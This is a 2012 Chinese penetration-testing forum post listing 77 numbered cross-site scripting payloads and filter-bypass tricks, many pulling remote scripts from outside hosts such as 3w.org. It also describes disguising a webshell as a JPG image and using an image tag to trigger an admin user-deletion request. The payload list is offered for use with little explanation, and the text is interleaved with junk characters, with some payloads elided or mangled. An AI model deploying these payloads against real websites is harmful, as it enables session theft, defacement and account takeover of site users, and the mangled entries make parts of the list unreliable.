找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 xss详细利用大全1
返回列表 发新帖
查看: 2963|回复: 0
打印 上一主题 下一主题

xss详细利用大全1

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:04:56 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
跨站图片shell
% j4 ^6 q* ~7 @' A2 F! w9 \XSS跨站代码  <script>alert("")</script>
8 _  r( ?+ S/ R* }2 ~3 d8 e6 L2 S" {$ G- [6 c, l8 Z5 J1 E
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马" C+ a/ S# T. m/ b; y
% o: y# [6 X6 C$ n8 p2 a- }7 s6 k
8 g1 R+ l8 a$ c& c* \
: Q; w! I/ l  S2 G+ B
1)普通的XSS JavaScript注入
+ I! n- o2 r& y1 V# v4 r8 d4 u  O9 }<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& [% X6 y* W7 ?. y* ^. C# c

8 i) v/ k4 _- E' n2 q& Y, a0 P(2)IMG标签XSS使用JavaScript命令5 u9 \. m2 @1 }. P7 R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* L8 l+ E+ h9 M+ t* r3 ]4 N3 i

# i# l  i; r2 o6 H(3)IMG标签无分号无引号
! ]6 v: F% m7 K% t$ Z<IMG SRC=javascript:alert(‘XSS’)>
( [5 E% U& _, C2 ^2 Q8 ?, n7 P0 z8 v. i) X! [! @' e
(4)IMG标签大小写不敏感  M/ r) y; D- D' s
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" F" d8 j- ^( ?  E, c6 j6 ?" J2 T( k6 ^: s7 w6 h
(5)HTML编码(必须有分号)
6 o% h! Y- h& N0 r<IMG SRC=javascript:alert(“XSS”)>3 B; r' d$ x8 ~- J
) u& \) S- `% L: x+ O, {
(6)修正缺陷IMG标签
3 H( s8 \+ d- J) \/ ?" r2 Q<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
  x* ^0 F0 T# y" a' t" ]+ F  W: J0 u; k0 m6 [, M# F, t' a
(7)formCharCode标签(计算器). e( m6 G3 a; l# s
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>7 n7 P) }- E+ ^8 a6 o$ a# U4 G

/ w/ P9 K$ N/ s(8)UTF-8的Unicode编码(计算器)
/ D# {. Z' a' Z  j7 w* @' r5 a<IMG SRC=jav..省略..S')>$ ?8 u1 e* B. W2 X8 x
+ `* [( z* P* @( d
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)$ A+ U: I# L  B7 c2 J. l5 u9 E
<IMG SRC=jav..省略..S')>
2 `4 ^* S* j. Q% f7 q5 J% @* Y. s3 n( |9 f) a1 B6 G
(10)十六进制编码也是没有分号(计算器); [$ Q1 K" R+ D4 W' Y5 R/ _5 i
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>: a( O/ l- e# p8 C1 y* \/ S- i, E

( Q/ `( Y# x# ~( S: A(11)嵌入式标签,将Javascript分开2 m: G- W6 T  q. ^" {
<IMG SRC=”jav ascript:alert(‘XSS’);”>$ @& J& p' J$ ]5 D: ~
5 o: G4 K9 C( h' A: j* w$ g
(12)嵌入式编码标签,将Javascript分开: q0 N9 e( n+ s: A% x/ I6 o: X: X" r
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 u! |* Y# d8 t# P5 [2 x, c) c% e, K" p# b* S: k8 V( u0 _
(13)嵌入式换行符
' @6 c. |: E) V% Z+ C. |. ?<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 I/ b% M% t1 q1 m3 ], x) Y
8 C: j# i0 p' j6 ?2 E+ L(14)嵌入式回车
5 Y, V  B3 _& W9 o- u& G7 r<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 B( c9 E& B. u( i2 e4 z: u1 y, \9 h/ E: L# Y3 X; Q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子  J1 {1 `- r9 J- ]# T
<IMG SRC=”javascript:alert(‘XSS‘)”>
0 x& V* @6 _0 @9 u
( C: T+ q9 v/ N$ \5 B(16)解决限制字符(要求同页面)' q9 w) Q# @& o  K  F$ J; B; @1 L% V
<script>z=’document.’</script>
1 W8 Q7 e5 Z* _5 S5 ?& c<script>z=z+’write(“‘</script>
' h0 C- N* K; A<script>z=z+’<script’</script>; n2 y9 L5 C! C, z1 T
<script>z=z+’ src=ht’</script>
) T2 r- g& e- _* @% d+ [<script>z=z+’tp://ww’</script># _' x6 Y. t6 l& k6 M% a9 E3 W
<script>z=z+’w.shell’</script>. B, s; J( B- \9 j' g9 A
<script>z=z+’.net/1.’</script>
( }4 F! o2 U* W# x<script>z=z+’js></sc’</script>" N8 Y( j7 d- e
<script>z=z+’ript>”)’</script>
2 l! ?( \* g3 h. J# B<script>eval_r(z)</script>
+ Z" Z( E0 O$ a4 M$ E9 c& b- l1 L; U( |& R* J# ?
(17)空字符# Y/ Q; v; k& j5 t% u5 E
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out8 t$ t6 H" D; N( D7 x
/ _+ F4 Y) G* j! _
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 U& [4 a0 _5 }0 @0 u' V
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out( c8 C% S; B$ ]  Y

5 l! H* T3 z, F# u4 U  X5 m3 ^  ](19)Spaces和meta前的IMG标签% F- U% j& [+ N) @  H. H5 @
<IMG SRC=” javascript:alert(‘XSS’);”>
2 c" Y3 Y) V# w" T/ h% M3 o1 O/ w5 c8 Y2 z
(20)Non-alpha-non-digit XSS
4 k9 b8 O6 k3 N0 M<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# k  v& L% I9 k* Z% {1 ~# N7 r
' m5 o" \! [: I/ n. Z(21)Non-alpha-non-digit XSS to 2
2 F: Q6 c: W; }  h; i! v/ T% W<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>( Q- _3 X2 d& n! \

' Q, e0 d& a) J(22)Non-alpha-non-digit XSS to 3$ {/ W3 V  ^% _4 m
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>* N0 c5 A3 X6 n% H; E$ w- n

+ K; p& S" G2 i8 o5 R* E) `(23)双开括号  H  s8 v5 R4 J& l
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 ?" Y/ l! M" k" s* F- C6 r% A4 n; s& [2 S; c9 m" B
(24)无结束脚本标记(仅火狐等浏览器)! J0 Z) _5 r" e
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>6 R* |1 Y% W' C4 ~$ ~

6 z" f8 [/ K5 k: r0 {6 [( p% [(25)无结束脚本标记2# v4 \1 {: J, g. z
<SCRIPT SRC=//3w.org/XSS/xss.js>
2 x3 u6 u" O& Q$ s" c) r+ m# k  _, _" x/ [6 y% B" @  {. w  S
(26)半开的HTML/JavaScript XSS
2 [. `  U' P7 Y- T<IMG SRC=”javascript:alert(‘XSS’)”2 u& ]$ `% D* Q3 w5 U% \

/ n7 R3 x3 c4 W4 ~4 l(27)双开角括号" C* m8 U8 v; A  o# s- K
<iframe src=http://3w.org/XSS.html <# l. m( Z( ]6 N( M! K5 b
  U( b( c- [/ E  m, h2 z
(28)无单引号 双引号 分号
0 [' p9 W6 }- `; y+ S! |/ h; k$ O<SCRIPT>a=/XSS/9 V0 \, t* u9 F( e
alert(a.source)</SCRIPT>
0 P, G4 m" o# ]' t
7 Z. [( s2 j% Q/ K2 ]8 g(29)换码过滤的JavaScript
0 `; E% e6 p6 x3 F# g\”;alert(‘XSS’);//- a3 L0 R" ?" f8 G

8 q" }9 H6 W, u(30)结束Title标签
  k$ {0 i; x. e' O6 {+ O! w& W</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' Y" P  C0 ^3 _6 N0 g% q
* K4 c: A& l3 y$ `5 M! q: l
(31)Input Image9 b/ N; T3 y8 [0 X
<INPUT SRC=”javascript:alert(‘XSS’);”>5 K1 J; N/ O. z& s- K' r  r; ^

! Q! K, _2 i$ c! S(32)BODY Image( q/ a! H+ c- W; c
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
/ Y9 P( M7 N( Q  q4 K% Y$ k/ N; I% _5 R$ Y+ j7 S/ Y( P2 Z
(33)BODY标签
" [. x$ Q( U; x# y- e/ D# Y' M<BODY(‘XSS’)>; _. n7 {  j0 T* f

* O& b( `7 q! \( B/ O! n: z(34)IMG Dynsrc! J$ @$ l, D' Q' m# [% p
<IMG DYNSRC=”javascript:alert(‘XSS’)”>! a/ b0 v, M; T" V

: N8 I9 U) a4 V: g, q: U& E; ](35)IMG Lowsrc0 l0 Y/ w' T( c% l3 v7 j: I! J; n
<IMG LOWSRC=”javascript:alert(‘XSS’)”>) r/ F: p1 J. E$ M  D

" s+ U) I: O" h0 D(36)BGSOUND
# _) _/ i9 {$ E2 Y, _<BGSOUND SRC=”javascript:alert(‘XSS’);”>
% D7 y7 O; G4 a! \( n+ p/ q+ U- A3 Z' k5 q
(37)STYLE sheet! T' q/ r8 F! A
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>8 K7 _0 ]. V9 l

* F7 f1 i: c. x8 X' {(38)远程样式表& ~4 T( o2 U0 m( h/ E( o
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
0 ~0 K+ H8 [. P: w) `. T, m' G+ [0 `5 Y2 Y
(39)List-style-image(列表式)4 y0 _1 N4 y0 m- s9 ^( X
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
  F9 [) |$ b; I$ T1 g/ L7 {; Y6 B0 V+ y
(40)IMG VBscript
5 [( w- H2 y1 Y3 `2 S<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS% w% s( k4 Q% A. w2 L
/ p$ Y  N5 a5 c$ p! V5 N. _
(41)META链接url
( {: q8 @6 k2 [: }* x3 p  B2 C' Y<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
# w$ O! i+ I2 j) h: [9 Q/ M) `: o8 b
(42)Iframe" ~* P% c* q( U8 Q  i
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
0 F* f8 r2 \- l* T/ g6 p) H(43)Frame/ H# Z- m# X' [1 m# L' O
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
5 K, Q. @) ]! N! D9 l# F: _1 b9 ?( `* Q' T# q/ q" s6 P: C/ [
(44)Table
% w' o' Y7 o7 J3 D<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
2 X) N: |2 Q& \7 W; u& x
" [$ A) D  m+ N& u(45)TD
8 H0 A6 ?, f- Q) C<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
* [1 U, ]" z; G" @
$ {9 D% {* x  i* }2 M(46)DIV background-image8 [" T" ~! [/ L2 Z! A" y( m7 b7 r3 O5 C
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, u; v. n, Z0 M  [6 X$ d/ S, D  V- R4 j. m& C( {# B( B
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- p+ D$ T8 \9 s- @+ `
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
  O2 l; d0 o2 y7 ~
4 I% h( J7 h6 H/ O4 v/ i8 ^0 O! |' k(48)DIV expression. D8 [* f: `- `, i
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>( `8 q8 ]) w  o4 B

" \4 }3 Y: U. u! P& p, W(49)STYLE属性分拆表达% _3 D5 A: I  M/ j* H, |
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( g/ p& w/ T1 N; q- l
. v( I4 H9 t6 G6 G! {0 k(50)匿名STYLE(组成:开角号和一个字母开头)% O) |% F; s9 ?( k: \% E9 P" x# S7 J
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
! Q2 ?& N$ h1 L6 G& v2 v/ o: x$ R( M( U; Y
(51)STYLE background-image. l7 ~7 i/ H/ M: }
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>* i* W% U& `$ r2 n9 G

% S% J9 _6 n* `- s(52)IMG STYLE方式
# l; z" F( d1 q$ ]( w* r6 ], {exppression(alert(“XSS”))’>
3 }' f7 d+ s4 a, q, d7 z1 W: f+ s' ~% t2 P7 `1 X9 S
(53)STYLE background
) k+ Y( e5 ]2 `<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: Z7 a1 k3 n6 b4 P, ?

( f1 m* z& V) I(54)BASE
1 m! g* o7 D! `2 k% w1 W$ }$ X<BASE HREF=”javascript:alert(‘XSS’);//”>/ ?, K! `' }8 `! L  i5 K" c
* }7 R% h# K* c
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS/ F$ e5 [7 ?$ x
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>; j* a" \& o) V

$ u, o; E9 `4 ?2 d) |) e4 p(56)在flash中使用ActionScrpt可以混进你XSS的代码
% A; K3 J+ _0 O$ t7 B% T' Ya=”get”;
6 o$ q' [9 J9 |5 e: Gb=”URL(\”";. }' K+ V2 C8 u2 v8 L; M  c
c=”javascript:”;
+ F1 H) @4 i& v, q7 @- Fd=”alert(‘XSS’);\”)”;+ R7 a1 c9 z( `; n% `* g4 U
eval_r(a+b+c+d);
3 Y  D; R- h8 R& r
. u# K/ H% w; V' v( x(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) e; D" @6 U. K+ J. X<HTML xmlns:xss>, F( k* J6 y& J4 x8 @* u: _0 T
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>4 Z& T) K, f9 C
<xss:xss>XSS</xss:xss>
$ [/ b+ `7 \% a4 k</HTML>
7 a. ?0 i9 }& g/ q) e! Q% _' B
( Q( ]3 O6 D1 r, O! G# X2 w(58)如果过滤了你的JS你可以在图片里添加JS代码来利用7 R( j! j* i3 t  M7 u' s0 X
<SCRIPT SRC=””></SCRIPT>7 @5 I$ A9 ^+ R# L8 H  L
/ I0 z/ C' `8 x1 G" b
(59)IMG嵌入式命令,可执行任意命令9 a7 I1 }8 R  o' W9 x
<IMG SRC=”http://www.XXX.com/a.php?a=b”>, M6 ^+ Z0 J% f$ S' E* b8 k

- V% b9 e+ C( h; K(60)IMG嵌入式命令(a.jpg在同服务器)
9 w0 x# h1 Q4 YRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser% ]) ^$ R6 U. B4 h8 O9 ^# n

7 `( }. t, M9 W& l+ @(61)绕符号过滤
( ?- J" h( N+ `. q4 p5 s+ v. s<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># h# x6 [: q2 I* `

" C; h, G* B2 a(62)
4 ~* h: {3 w( E/ i<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>3 r+ E/ k/ I) G, Q- ~7 r4 a+ y

7 ]* e( @# f! Z  K# D. ~% s(63)
0 M8 b3 x: i. I* i+ p1 I<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>6 M0 a. X0 B; M3 ?& v

* P. ^, n. M$ C(64)
6 J2 w( N- o7 Z- L. b<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>% W9 O2 X( M' `$ s

0 ?1 O3 j( _9 w7 O1 h(65)9 {& ?8 R, {; h8 p2 [
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>7 H* B: S' X; {

& L, M8 e) @) W( t$ {9 o(66)' i  i4 z( Q- C/ u  H( J9 M$ H5 i. Y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
, [4 h# e4 Q' @1 b* O: y: X. ^: Q, M: f
(67)( c7 W0 ^! z6 \! p, K
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
. K; t4 o- `: a. I9 d  {& C
2 L, T$ Q$ h* M( |, X1 e+ w# P3 c(68)URL绕行
$ q5 h; F, q8 l1 i<A HREF=”http://127.0.0.1/”>XSS</A>$ `4 Z: V( G+ @' l/ G& r+ V! s
1 M1 z' d* Q& |# M, a/ s
(69)URL编码
! Z, R- w3 C: _. {<A HREF=”http://3w.org”>XSS</A>
$ ?/ @1 ^. u  e, @/ |+ a1 ?0 m2 c* n! ^. S2 ~  E
(70)IP十进制0 m$ D+ l6 a1 w4 R' L4 g  `
<A HREF=”http://3232235521″>XSS</A>9 e. L8 |9 |# h( q6 @

6 v& _; h7 f. \/ o" L( d1 S(71)IP十六进制- q; M% f& c' D6 l
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
! @* \, a/ E5 b, F+ o# ^6 e# {) Z' _1 ], o% y
(72)IP八进制
4 q- l- f! W* K* g<A HREF=”http://0300.0250.0000.0001″>XSS</A>
: H, D/ O: r2 l5 q* |2 N* N/ [) f/ @6 G; |& l; A
(73)混合编码
( E0 G. K& M: k5 b3 D+ m" H<A HREF=”h1 d3 V: ~5 I" ?) w
tt p://6 6.000146.0×7.147/”">XSS</A>
; `: ?" A) d0 V0 I+ `+ [% z. c6 `+ F9 }8 c6 f
(74)节省[http:]: F: \- B! S) b4 V8 M
<A HREF=”//www.google.com/”>XSS</A>$ h4 h) Q4 F1 y7 @( ^; k# |

; _% |' B* Q7 O. ~(75)节省[www]+ K8 G' i$ P( Y2 Q! o$ @' }2 R
<A HREF=”http://google.com/”>XSS</A>3 c& Z+ s. o3 y: p3 K
: o! c4 {) e. C1 V2 c
(76)绝对点绝对DNS
* t( W& @: U, b) a4 p3 B<A HREF=”http://www.google.com./”>XSS</A>) ]4 u9 [! X6 q9 ]9 e8 v8 Z
( }* {2 V, q9 s. X- B
(77)javascript链接- j8 {' A, d% n, o" l9 `- m
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>2 s4 J4 @2 W: w1 E
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表